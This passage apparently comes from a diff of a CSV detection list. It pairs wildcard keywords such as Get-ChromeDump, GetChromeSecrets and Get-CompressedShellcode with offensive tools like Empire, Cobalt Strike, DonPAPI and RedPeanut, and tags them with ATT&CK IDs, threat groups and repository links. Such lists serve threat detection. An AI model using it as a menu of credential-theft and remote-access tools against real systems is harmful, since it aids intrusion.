T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-CachedGPPPassword*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-CachedRDPConnection*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" -"*Get-CachedRDPConnection*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Get-ChromeBookmarks*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-ChromeDump*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-ChromeDump*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1150","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-ChromeHistory*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*GetChromeSecrets*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" -"*GETCLIPBOARD*GETLOCALGROUP*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*Get-ClipboardContents*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-ClipboardContents.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1070","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-CachedRDPConnection*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-ChromeBookmarks*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-ChromeDump*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-ChromeDump*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1150","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-ChromeHistory*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*GetChromeSecrets*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*GETCLIPBOARD*GETLOCALGROUP*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*Get-ClipboardContents*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-ClipboardContents.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1070","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-CompressedAgent*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*Get-CompressedAgent.ps1*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*Get-CompressedShellcode*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*Get-CompressedShellcode.ps1*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*Get-ComputerDetails*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*GetComputersFromActiveDirectory*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - 